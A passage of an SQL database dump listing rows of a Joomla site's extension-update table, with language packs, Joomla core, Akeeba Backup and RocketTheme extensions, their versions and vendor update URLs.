CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13327,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13328,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13329,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13330,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13331,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13332,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13333,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(13334,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13335,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(13336,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13337,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13338,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13339,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13340,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13341,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13342,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13343,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13344,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13345,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13346,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13347,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13348,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13349,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13350,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13351,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13352,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13353,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13354,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-0.html\n				',''),(13355,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13356,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13357,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13358,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13359,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13360,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13361,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13362,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13363,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13364,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13365,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13366,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13367,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13368,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13369,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13370,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13371,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13372,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13373,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13374,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13375,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13376,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13377,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13378,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13379,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13380,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13381,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13382,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13383,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13384,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13385,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13386,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13387,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13388,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13389,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13390,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13391,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13392,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13393,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13394,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13395,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13396,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13397,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13398,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13399,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13400,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13401,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13402,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13403,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13404,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13405,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13406,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13407,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13408,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13409,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13410,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13411,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13412,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13413,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13414,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13415,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13416,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13417,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13418,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13419,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13420,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13421,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13422,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13423,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13424,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(13425,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(13427,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13428,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13429,57,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13430,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13431,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13432,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13433,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13434,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13435,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13436,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13437,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13438,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13439,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13440,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13441,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13442,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13443,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13444,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13445,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13446,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13447,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13448,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13449,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13450,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13451,57,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13452,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13453,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13454,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13455,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13456,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13457,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13458,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13459,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13460,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13461,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13462,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13463,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13464,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13465,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13466,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13467,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13468,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13469,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13470,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13471,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13472,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13473,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13474,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13475,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(13476,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(13477,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-2.html\n				',''),(13478,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13479,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13480,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13481,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-1.html\n				',''),(13482,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(13483,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(13484,3,0,'French','','pkg_fr-FR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(13485,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(13486,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13487,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(13488,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(13489,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(13490,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(13491,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(13492,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(13493,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(13494,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(13495,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(13496,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(13497,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(13498,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(13499,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(13500,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(13501,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(13502,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(13503,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(13504,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(13505,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(13506,3,0,'English US','','pkg_en-US','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(13507,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(13508,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(13509,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(13510,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(13511,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(13512,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(13513,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(13514,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(13515,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(13516,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(13517,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(13518,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(13519,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(13520,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(13521,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(13522,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(13523,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(13524,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(13525,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(13526,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(13527,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(13528,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(13529,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(13530,1,0,'Joomla','','joomla','file','',0,'3.9.16','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(13531,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(13532,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(13533,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(13534,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(13535,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(13536,20,0,'RokCommon 